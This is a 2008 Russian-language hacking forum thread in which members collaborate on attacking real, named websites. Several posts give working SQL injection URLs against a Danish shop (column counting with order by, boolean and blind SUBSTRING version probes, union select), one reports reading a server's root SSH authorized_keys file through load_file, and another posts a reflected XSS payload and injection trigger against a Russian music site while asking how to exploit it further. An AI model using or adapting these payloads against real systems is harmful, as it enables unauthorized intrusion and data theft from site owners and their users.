Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    чтото я не понял сути поста .. может мне тоже учится пойти надо...
    кол-во колонок, обычно так ищут ..
    http://www.viper-shop.dk/category.php?id=180'+order+by+16/*
    так что делаем вывод, 15 колонок .. можно в ошибке посмотреть кол-во колонок, но там не то колво, ибо c.*
    вывода не добился..
    лучше поискать на сайте ещё скули, возможно проще будет, ну или эту поковырять ещё ..
     
    #4001 159932, 6 Dec 2008
    Last edited: 6 Dec 2008
  2. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    ну тогда зайди и посмотри вывод
    и
    отличается чем-то?
    и вообще с чего вдруг взяли что там sql-inj?
     
    1 person likes this.
  3. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    вот эти два вывода разные:

    Code:
    http://www.viper-shop.dk/category.php?id=179'+AND+'1'='1
    http://www.viper-shop.dk/category.php?id=179'+AND+'1'='0
    инъекция там есть.
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Там есть иньекция, но перебирать придется вслепую, так как там сложный запрос с left join, фильтр там /*

    http://www.viper-shop.dk/category.php?id=180%27+union+select+1/*

    потому что если подставить

    http://www.viper-shop.dk/category.php?id=180%27+union+select+1--

    то совсем другой рез-т. Т.е. с этой ссылкой надо поработать как с Blind SQL-inj
     
  5. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    gisTy
    читай мой пост! если скажешь что это не иньекция, то я сьем свой тапок!
    http://www.viper-shop.dk/category.php?id=180'+order+by+15/*
    и
    http://www.viper-shop.dk/category.php?id=180'+order+by+16/*

    -------------
    как сказал Pashkela, тут слепая иньекция, да ещё и 4ая ветка
    http://www.viper-shop.dk/category.php?id=180'+AND+SUBSTRING((select+version()),1,1)='4
    тк кк Access denied for user 'viper-shopdk'@'%' to database 'mysql' то тут надо перебирать таблы .. мне лень, еси кому то интересно - удачи ))
     
    #4005 159932, 6 Dec 2008
    Last edited: 6 Dec 2008
  6. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    сори.. это я ступил малость..
     
  7. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Не могу окончательно понять понять что означает:
    Пример:
    union+select+1,3,4,5,6,7,8,9/*
    union+select-(Выбрать из базы)
    А что означают 1,2,3,4,5,6,7,8,9 Поля в таблице?
     
  8. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    geforce, иди почитай
    https://forum.antichat.ru/thread43966.html
     
  9. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Я уже милион раз читал это! Мне нуген ответ на вопрос

    Вот запрос к базе пример:

    PHP:
    mysql_query (SELECT FROM название таблицы)
    когда я пишу union select 1,2,3,4,5,6,7,8,9 какую роль играют эти цыфры?

    И вопрос:

    Существует ли способ обойти функцыю htmlspecialchars(); если да то как?
     
  10. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    2 geforce
    значит прочитай ещё раз ..
    там всё написано .. если сам поймёшь - значит действительно поймёшь .. а так, забудешь - на завтра.
     
  11. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Еще это следует почитать http://www.ipmce.su/~lib/osn_prav.html#0008
     
  12. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    При чтении load_file-ом нашёл публичные ключи в ./root/.ssh/authorized_keys:

    bЃ .authorized_keys.nV0WVg bЃ Иauthorized_keys

    Справа отчётливо имя файла authorized_keys,а слева что за херня ? Юзал SIPT 4.0

    Система - FreeBSD

    И ещё: кучу всякого в var/tmp валяется,включая идентификаторы сессий.

    mysql-5.tgz к примеру.
     
    #4012 Велемир, 6 Dec 2008
    Last edited: 6 Dec 2008
  13. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Ну да, колонки в таблице.
    Подбирать их следует, т.к. перед union есть опред. кол-во столбцов и после union - должно быть столько же.
     
  14. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Существует ли способ обойти функцыю htmlspecialchars(); если да то как?
     
  15. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    А чё её обходить,если она и так не работает : DD
     
  16. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    geforce

    для хсс врятле обойдеш... скуля хз, помоему тоже..

    есть тема уже, о ее безопастности )
    https://forum.antichat.ru/showthread.php?t=64500
     
    #4016 sabe, 7 Dec 2008
    Last edited: 7 Dec 2008
    1 person likes this.
  17. none222

    none222 Guest

    Reputations:
    0
    Если аргумент не в кавычках то скулю можно забомбить
     
  18. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Это кол-во полей, количество которых ты проверял к примеру так: +order+by+9/*
    Цифра 9 - максимальное значание, при котором не вылетает ошибка мускуля. Значит пишешь +union+select+1,2,3,4,5,6,7,8,9/*
    Если бы при 9 вылетала уже ошибка, а пк примеру при 5 нет... Значит будет 5 полей. То есть +union+select+1,2,3,4,5/*
     
  19. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Помоему на простые вопросы есть банально простой раздел... Может я ошибаюсь?
     
  20. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Помогите с интересным сайтом. это mp3real.ru. Дырявый, шопи**ец. Ничерта в поиске не фильтруется... нашел пассивную xss
    http://www.mp3real.ru/search/?type=art&q="><script>alert()<script>
    и нашел вроде бы sql inj , но не уверен. Если и скуль, то очень странный. Ошибку вызывает запрос
    http://www.mp3real.ru/search/?type=art&q=<'' (две одиннарные)
    Вопрос - как развернуть inj? У кого-нить есть предложения по этому поводу?
     
Thread Status:
Not open for further replies.